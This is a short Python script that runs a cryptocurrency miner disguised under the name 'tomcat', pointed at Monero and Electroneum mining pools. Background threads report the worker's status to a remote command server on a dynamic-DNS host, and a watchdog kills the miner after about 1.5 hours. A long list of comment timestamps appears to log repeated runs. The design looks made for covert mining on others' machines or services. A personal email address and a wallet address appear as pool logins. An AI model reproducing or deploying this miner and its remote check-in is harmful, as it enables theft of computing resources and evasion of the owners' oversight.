import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:05.785563
#2018-02-17 16:33:01.976317
#2018-02-17 18:21:05.328520
#2018-02-17 20:09:06.069273
#2018-02-17 21:56:05.191689
#2018-02-17 23:41:04.806262
#2018-02-18 01:29:06.650468
#2018-02-18 03:15:09.233583
#2018-02-18 05:05:09.156329
#2018-02-18 06:57:07.415850
#2018-02-18 08:45:06.388879
#2018-02-18 10:32:06.829835
#2018-02-18 12:17:06.119088
#2018-02-18 14:04:05.383213
#2018-02-18 15:53:06.629658
#2018-02-18 17:43:02.236871
#2018-02-18 19:30:05.507114
#2018-02-18 21:15:09.310193
#2018-02-18 23:04:03.350930
#2018-02-19 00:51:05.979287
#2018-02-19 02:37:07.609723
#2018-02-19 04:23:04.340414
#2018-02-19 06:07:07.364149
#2018-02-19 07:55:06.760746
#2018-02-19 09:46:07.668729
#2018-02-19 11:36:07.686943
#2018-02-19 13:23:04.923966
#2018-02-19 15:10:06.879981
#2018-02-19 16:59:08.327121
#2018-02-19 18:46:08.002188
#2018-02-19 20:38:01.823290
#2018-02-19 22:24:07.220549
#2018-02-20 00:10:05.308351
#2018-02-20 01:56:03.506358
#2018-02-20 03:47:07.264809
#2018-02-20 05:33:01.524056
#2018-02-20 07:17:01.849611
#2018-02-20 09:03:06.206479
#2018-02-20 10:46:06.654544
#2018-02-20 12:32:05.060075
#2018-02-20 14:19:08.514113
#2018-02-20 16:02:06.235541
#2018-02-20 17:49:08.215972
#2018-02-20 19:41:01.575429
#2018-02-20 21:29:01.603369
#2018-02-20 23:12:06.095109
#2018-02-21 00:56:06.597382
#2018-02-21 02:43:05.760755
#2018-02-21 04:35:08.029547
#2018-02-21 06:23:05.640786
#2018-02-21 08:08:01.947299
#2018-02-21 09:54:07.361759
#2018-02-21 11:43:08.643256
#2018-02-21 13:33:07.090781
#2018-02-21 15:18:03.832765
#2018-02-21 17:08:01.984557
#2018-02-21 18:54:08.039192
#2018-02-21 20:43:04.393741
#2018-02-21 22:27:06.879113
#2018-02-22 00:17:02.956374
#2018-02-22 02:05:07.609875
#2018-02-22 03:50:07.794719
#2018-02-22 05:37:06.379512
#2018-02-22 07:23:03.974883
#2018-02-22 09:10:01.687688
#2018-02-22 10:58:01.488830
#2018-02-22 12:45:09.757071
#2018-02-22 14:32:07.471812
#2018-02-22 16:18:08.974892
#2018-02-22 18:19:09.157817
#2018-02-22 20:12:05.567164
#2018-02-22 21:58:04.454466
#2018-02-22 23:45:04.072098
#2018-02-23 01:34:01.788832
#2018-02-23 03:20:04.216043
#2018-02-23 05:06:03.737801
#2018-02-23 06:50:09.018558
#2018-02-23 08:37:03.997201
#2018-02-23 10:52:06.650967
#2018-02-23 12:48:06.889798
#2018-02-23 14:32:01.711615
#2018-02-23 16:21:09.956840
#2018-02-23 18:07:04.851141
#2018-02-23 19:52:04.686961
#2018-02-23 21:35:09.274702
#2018-02-23 23:24:01.798508
#2018-02-24 01:17:06.101003
#2018-02-24 03:07:05.895193
#2018-02-24 04:53:05.770167
#2018-02-24 06:37:06.151722
#2018-02-24 08:26:07.132129
#2018-02-24 10:12:07.513022
#2018-02-24 12:07:06.032886
#2018-02-24 13:56:05.685103
#2018-02-24 15:46:03.932211
#2018-02-24 17:38:01.567751
#2018-02-24 19:23:01.375738
#2018-02-24 21:13:07.200823
#2018-02-24 23:49:01.263626
#2018-02-25 03:08:03.956701
#2018-02-25 06:50:07.360511